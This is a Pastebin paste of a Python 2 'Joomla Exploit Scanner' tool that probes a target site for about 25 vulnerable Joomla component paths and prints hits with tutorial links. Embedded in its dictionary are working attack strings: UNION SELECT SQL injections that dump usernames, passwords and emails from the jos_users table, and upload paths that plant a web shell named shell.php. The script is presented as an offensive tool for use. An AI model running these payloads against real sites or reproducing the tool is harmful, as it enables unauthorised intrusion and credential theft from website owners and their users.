G2A Many GEOs
SHARE
TWEET

Joomla Exploiter Scanner Vunlerability

choirurrizal Jan 2nd, 2017 (edited) 171 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2.  
  3. import sys
  4. import urllib2
  5. import re
  6. import time
  7. import httplib
  8. import random
  9.  
  10. # Color Console
  11. W  = '\033[0m'  # white (default)
  12. R  = '\033[31m' # red
  13. G  = '\033[1;32m' # green bold
  14. O  = '\033[33m' # orange
  15. B  = '\033[34m' # blue
  16. P  = '\033[35m' # purple
  17. C  = '\033[36m' # cyan
  18. GR = '\033[37m' # gray
  19.  
  20. #Bad HTTP Responses
  21. BAD_RESP = [400,401,404]
  22.  
  23. def main(path):
  24.     print "[+] Testing:",host.split("/",1)[1]+path
  25.     try:
  26.         h = httplib.HTTP(host.split("/",1)[0])
  27.         h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
  28.         h.putheader("Host", host.split("/",1)[0])
  29.         h.endheaders()
  30.         resp, reason, headers = h.getreply()
  31.         return resp, reason, headers.get("Server")
  32.     except(), msg:
  33.         print "Error Occurred:",msg
  34.         pass
  35.  
  36. def timer():
  37.     now = time.localtime(time.time())
  38.     return time.asctime(now)
  39.  
  40. def slowprint(s):
  41.     for c in s + '\n':
  42.         sys.stdout.write(c)
  43.         sys.stdout.flush() # defeat buffering
  44.         time.sleep(8./90)
  45.  
  46. print G+"\n\t                 Joomla! Exploit Scanner"
  47. slowprint (R+"\n\t                    recoded by "+O+"N45HT"+O)
  48. print W+"           Thanks to all member N45HT & Indnesian Freedom Security"
  49.  
  50. xpls = { "images/artforms/attachedfiles/" : ["com_artforms","http://adf.ly/e3nes"],"index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1" : ["com_fabrik","http://adf.ly/e3luV"] , "index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--" : ["com_idoblog","http://adf.ly/e3m65"], "index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--" : ["com_ignitegallery","http://adf.ly/e3nA7"], "administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=shell.php" : ["com_maian15","http://adf.ly/e3kzf"], "administrator/components/com_maianmedia/charts/php-ofc-library/ofc_upload_image.php?name=shell.php" : ["com_maianmedia","http://adf.ly/e3l6O"] , "index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=" : ["com_media","http://adf.ly/e3lf7"], "administrator/components/com_redmystic/chart/tmp-upload-images/" : ["com_redmystic","http://adf.ly/e3lFf"], "index.php?option=com_users&view=registration" : ["com_user","http://adf.ly/e3lYt"], "index.php?option=com_jce" : ["JCE","link"] , "index.php?option=com_user&view=reset&layout=confirm" : ["com_user 2","http://adf.ly/e3kv0"] , "index.php?option=com_shohada&view=shohada" : ["com_shohada","http://adf.ly/e3kr3"], "index.php?option=com_smartformer" : ["com_smartformer","http://adf.ly/e3pI9"], "index.php?option=com_garyscookbook&func=newItem" : ["com_garyscookbook","http://adf.ly/e3rXR"],"index.php/component/osproperty/?task=agent_register" : ["com_osproperty","http://adf.ly/e3sVO"], "index.php?option=com_acymailing&gtask=archive&listid=" : ["com_acymailing [SQLi]","http://adf.ly/e4sYn"], "index.php?option=com_extplorer&action=show_error&dir=" : ["com_extplorer","http://adf.ly/e4tiP"] , "index.php?option=com_xmap&tmpl=component&Itemid=999&view=" : ["com_xmap" , "http://adf.ly/e4vV1"] , "index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*" : ["com_content [SQLi]" , "http://adf.ly/e4wKe"] , "/index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*" : ["com_flippingbook [SQLi]" , "http://adf.ly/e4wUM"] , "index.php?option=com_phocagallery&view=categories&Itemid=" : ["com_phocagallery" , "http://adf.ly/e4wlq"] , "index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--" : ["com_lyftenbloggie [SQLi]" , "http://adf.ly/e4wzk"] , "index.php?option=com_wrapper&view=wrapper&Itemid=":["com_wrapper","http://adf.ly/e4xjq"] , "index.php?option=com_fireboard&Itemid=":["com_fireboard","http://adf.ly/e4yf8"], "j/index.php?option=com_mailto&tmpl=component&template=beez_20&link=":["com_mailto [SPAM]","http://adf.ly/e4yyi"]}
  51.  
  52. if len(sys.argv) != 2:
  53.     print "\nUsage: python xploiter.py <site>"
  54.     print "Example: python xploiter.py www.site.com/\n"
  55.     sys.exit(1)
  56.  
  57. host = sys.argv[1].replace("http://","").rsplit("/",1)[0]
  58. if host[-1] != "/":
  59.     host = host+"/"
  60.    
  61. print "\n[+] Target:",host
  62. print "[+] Exploit Loaded:",len(xpls)
  63.  
  64. print "\n[+] Scanning Exploit\n"
  65. for xpl,(poc,expl) in xpls.items():
  66.     resp,reason,server = main(xpl)
  67.     if resp not in BAD_RESP:
  68.         print ""
  69.         print G+"\t[+] Result:",resp, reason
  70.         print G+"\t[+] Exploit:",poc
  71.         print G+"\t[+] Tutorial:",expl
  72.         print W
  73.     else:
  74.         print ""
  75.         print R+"\t[-] Result:",resp, reason
  76.         print W
  77. print "\n[-] Done\n"
RAW Paste Data
Ledger Nano X - The secure hardware wallet
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top